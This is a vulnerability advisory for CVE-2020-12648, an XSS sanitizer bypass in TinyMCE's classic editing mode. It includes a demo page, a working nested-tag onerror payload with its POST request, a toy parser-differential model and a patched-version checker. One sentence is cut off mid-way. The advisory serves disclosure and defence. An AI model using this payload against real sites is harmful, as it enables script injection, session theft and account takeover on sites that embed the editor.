The following document describes an identified vulnerability in the TinyMCE rich-text editor, version 5.2.1. TinyMCE is in use on thousands of websites, but the risk and impact of this vulnerability on those sites depend on the details of the application in which TinyMCE is embedded. The use of "classic" editing mode, existing XSS protections, and whether users can control the initial content loaded into the editor all affect the exploitability of this vulnerability.
Applications that use the TinyMCE text editor and do not implement additional XSS protections such as a strict content security policy (CSP) may be vulnerable to XSS. The exploitability and impact of this vulnerability are specific to the deployed application, but could result in sensitive information disclosure, privilege escalation, and account takeover.
Vendor: Tiny Technologies, Inc.
Product: TinyMCE
Affected versions: 5.2.1 and earlier (confirmed in 5.2.1 and 4.0.26)
Fix: update to version 4.9.11 (4.x line) or 5.4.1 (5.x line)
One vulnerability was identified within TinyMCE; it is described in the section below.
CVE ID: CVE-2020-12648
Severity: High
Impact: escalation of privileges, information disclosure, other (context-dependent)
Attack vector: remote
An XSS vulnerability is present in TinyMCE version 5.2.1. When the editor is used in classic (iframe-based) editing mode, TinyMCE's content stripping and sanitization logic can be bypassed using nested and non-terminated HTML tags: TinyMCE's own HTML parser and the browser's parser disagree about where the nested elements end, so an attacker can inject an <img> tag with an arbitrary onerror value that TinyMCE never strips, resulting in XSS.
To demonstrate the vulnerability, an HTML page was created with an instance of the TinyMCE editor, based on the official TinyMCE Quick Start Guide, as shown below:
<meta name="viewport" content="width=device-width, initial-scale=1">
<script src="https://cdn.tiny.cloud/1/no-api-key/tinymce/5/tinymce.min.js" referrerpolicy="origin"></script>
<!-- Classic (iframe) editing mode is TinyMCE's default, so no mode option is needed -->
<script>tinymce.init({ selector: '#mytextarea' });</script>
<h1>TinyMCE Quick Start Guide</h1>
<form method="post">
<!-- htmlspecialchars() stops the browser from treating the POST body as markup, but the textarea's decoded text is still handed to TinyMCE's parser as the editor's initial content -->
<textarea id="mytextarea" name="mytextarea"><?php echo htmlspecialchars($_POST['mytextarea'] ?? ''); ?></textarea>
<input type="submit" value="submit">
</form>
This example used PHP to supply user-controlled content to TinyMCE for rendering on page load. The payload could also be supplied directly through the TinyMCE
XSS was achieved using the following payload as user-supplied content:
<iframe><textarea></iframe><img src="" onerror="alert(document.domain)">
An example request is shown below:
POST /tinymce.php HTTP/1.1
…omitted for brevity…
mytextarea=<iframe><textarea></iframe><img src="" onerror="alert(document.domain)">
After the page loaded, the payload executed and alert(document.domain) fired, showing that the injected script ran in the origin of the page hosting the editor.
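The bypass demonstrated above is an instance of a parser differential: the sanitizer and the browser tokenize the same bytes into different element trees, so the sanitizer's attribute filtering never gets to see the element the browser ends up creating. As an added example (not TinyMCE's code, and not a reproduction of its actual parser logic), the JavaScript below models that differential with a toy tokenizer whose set of raw-text elements is configurable. The browser model follows the HTML specification; the sanitizer model, an assumption chosen purely for illustration, treats textarea but not iframe as raw text. PAYLOAD, BROWSER_RAW_TEXT, SANITIZER_RAW_TEXT, tokenize, sanitize, handlersSeenByBrowser and sanitizeHardened are all names introduced here.

```javascript
'use strict';

// Added example (not TinyMCE's code): a toy HTML tokenizer with a
// configurable set of "raw-text" elements, used to show how a sanitizer and
// the browser can disagree about where nested, unterminated tags end, and
// therefore about whether an <img onerror> element exists at all.

// The HTML spec's tokenizer switches to a raw-text or RCDATA state inside
// these elements: everything up to the matching end tag is text, not markup.
const BROWSER_RAW_TEXT = new Set([
  'script', 'style', 'iframe', 'noembed', 'noframes', 'xmp', 'textarea', 'title',
]);

// Hypothetical sanitizer model (an assumption for this example, NOT
// TinyMCE's actual parser): knows script, style and textarea are raw text
// but does not treat iframe that way.
const SANITIZER_RAW_TEXT = new Set(['script', 'style', 'textarea']);

// Constructed sample input: the payload from the advisory.
const PAYLOAD = '<iframe><textarea></iframe><img src="" onerror="alert(document.domain)">';

// Tokenize into {type:'start', name, attrs}, {type:'end', name} and
// {type:'text', value, raw}. Only as much of HTML as the demo needs.
function tokenize(html, rawTextElements) {
  const tokens = [];
  let i = 0;
  while (i < html.length) {
    if (html[i] !== '<') {
      const next = html.indexOf('<', i);
      const end = next === -1 ? html.length : next;
      tokens.push({ type: 'text', value: html.slice(i, end), raw: false });
      i = end;
      continue;
    }
    const m = /^<(\/?)([a-zA-Z][a-zA-Z0-9]*)([^>]*)>/.exec(html.slice(i));
    if (!m) { // a stray '<' is just text
      tokens.push({ type: 'text', value: '<', raw: false });
      i += 1;
      continue;
    }
    const name = m[2].toLowerCase();
    i += m[0].length;
    if (m[1]) { tokens.push({ type: 'end', name }); continue; }
    const attrs = {};
    const attrRe = /([^\s=\/]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
    let a;
    while ((a = attrRe.exec(m[3])) !== null) {
      const value = [a[2], a[3], a[4]].find((v) => v !== undefined);
      attrs[a[1].toLowerCase()] = value === undefined ? '' : value;
    }
    tokens.push({ type: 'start', name, attrs });
    if (rawTextElements.has(name)) {
      // Raw-text state: swallow everything up to the matching end tag, or to
      // the end of input if the tag is never closed (the "non-terminated" case).
      const rest = html.slice(i);
      const close = new RegExp('</' + name + '\\s*>', 'i').exec(rest);
      const textEnd = close ? close.index : rest.length;
      if (textEnd > 0) tokens.push({ type: 'text', value: rest.slice(0, textEnd), raw: true });
      i += textEnd;
      if (close) { tokens.push({ type: 'end', name }); i += close[0].length; }
    }
  }
  return tokens;
}

// Toy sanitizer: drop every on* attribute from the start tags it sees, then
// serialize. Text inside raw-text elements is written back verbatim, as a
// real sanitizer must do for <script>/<style> content.
function sanitize(html, rawTextElements) {
  let out = '';
  for (const t of tokenize(html, rawTextElements)) {
    if (t.type === 'text') {
      out += t.raw ? t.value : t.value.replace(/</g, '&lt;').replace(/>/g, '&gt;');
    } else if (t.type === 'end') {
      out += '</' + t.name + '>';
    } else {
      const kept = Object.entries(t.attrs).filter(([k]) => !k.startsWith('on'));
      out += '<' + t.name + kept.map(([k, v]) => ' ' + k + '="' + v.replace(/"/g, '&quot;') + '"').join('') + '>';
    }
  }
  return out;
}

// Event handlers the browser would actually see in `html`, as "tag@attr".
function handlersSeenByBrowser(html) {
  const found = [];
  for (const t of tokenize(html, BROWSER_RAW_TEXT)) {
    if (t.type !== 'start') continue;
    for (const k of Object.keys(t.attrs)) if (k.startsWith('on')) found.push(t.name + '@' + k);
  }
  return found;
}

// Hardened variant: parse with the browser's own rules (what a DOM-based
// sanitizer does) and refuse any output the browser would still read
// differently from the sanitizer.
function sanitizeHardened(html) {
  const out = sanitize(html, BROWSER_RAW_TEXT);
  const leaked = handlersSeenByBrowser(out);
  if (leaked.length) throw new Error('sanitizer output still carries ' + leaked.join(', '));
  return out;
}

// Demo when run with `node`: the toy sanitizer returns the payload untouched,
// yet the browser reads an <img onerror> out of that very string.
const bypassed = sanitize(PAYLOAD, SANITIZER_RAW_TEXT);
console.log('sanitizer model output :', bypassed);
console.log('browser sees handlers  :', handlersSeenByBrowser(bypassed));
console.log('browser-rules output   :', sanitizeHardened(PAYLOAD));
```

The point the trace makes is that attribute filtering never had a chance: under the sanitizer's model there is no img start tag at all, only text inside an unterminated textarea, so the onerror attribute is written straight back out. The only robust fix is to parse with the same rules the browser will apply to the result (or to re-parse the sanitizer's output with those rules and refuse on disagreement, as sanitizeHardened does); a CSP whose script-src omits 'unsafe-inline' is the defence-in-depth layer that would have stopped the inline onerror handler from running even when the sanitizer failed.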
The same vulnerability was also reproduced in TinyMCE version 4.0.26; its impact depends on the details of the application in which TinyMCE is used.
The patched versions are 4.9.11 for the 4.x release line and 5.4.1 for the 5.x release line.
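Because the fix landed separately in two release lines, a single "is the version at least 5.4.1" comparison misclassifies every patched 4.x build, and "at least 4.9.11" wrongly passes 5.0.0 through 5.4.0. The following is an added example (not TinyMCE's code) of a version check that keys on the release line first; FIXED, parseVersion, compareVersions, isPatched and versionFromGlobals are names introduced here. tinymce.majorVersion and tinymce.minorVersion are the properties a loaded TinyMCE build exposes in the browser (for 5.2.1 they are '5' and '2.1').

```javascript
'use strict';

// Added example (not TinyMCE's code): is an installed TinyMCE build patched
// for CVE-2020-12648? The advisory gives one fixed release per line.
const FIXED = { 4: [4, 9, 11], 5: [5, 4, 1] };

// Parse "5.2.1" (or a "5.2.1-dev" style string) into [major, minor, patch].
function parseVersion(v) {
  const m = /^(\d+)\.(\d+)(?:\.(\d+))?/.exec(String(v).trim());
  if (!m) throw new Error('unrecognised TinyMCE version: ' + v);
  return [Number(m[1]), Number(m[2]), Number(m[3] || 0)];
}

// Numeric, component-wise comparison (so 5.10.0 sorts after 5.4.1).
function compareVersions(a, b) {
  for (let i = 0; i < 3; i++) {
    if (a[i] !== b[i]) return a[i] < b[i] ? -1 : 1;
  }
  return 0;
}

// true when patched, false when vulnerable, null when the release line is
// not one the advisory covers (e.g. 3.x), so callers cannot mistake
// "unknown" for "safe".
function isPatched(version) {
  const parsed = parseVersion(version);
  const fixed = FIXED[parsed[0]];
  if (!fixed) return null;
  return compareVersions(parsed, fixed) >= 0;
}

// In a page, the running build reports itself through these two globals.
function versionFromGlobals(tinymceGlobal) {
  return tinymceGlobal.majorVersion + '.' + tinymceGlobal.minorVersion;
}

// Stand-alone demo over constructed inputs.
for (const v of ['4.0.26', '4.9.10', '4.9.11', '5.2.1', '5.4.0', '5.4.1', '5.10.0']) {
  console.log(v, isPatched(v) ? 'patched' : 'VULNERABLE');
}
```

In a browser console on a page that embeds the editor, isPatched(versionFromGlobals(tinymce)) gives the answer for the build that is actually loaded, which matters when a CDN URL or a vendored copy differs from what package.json says.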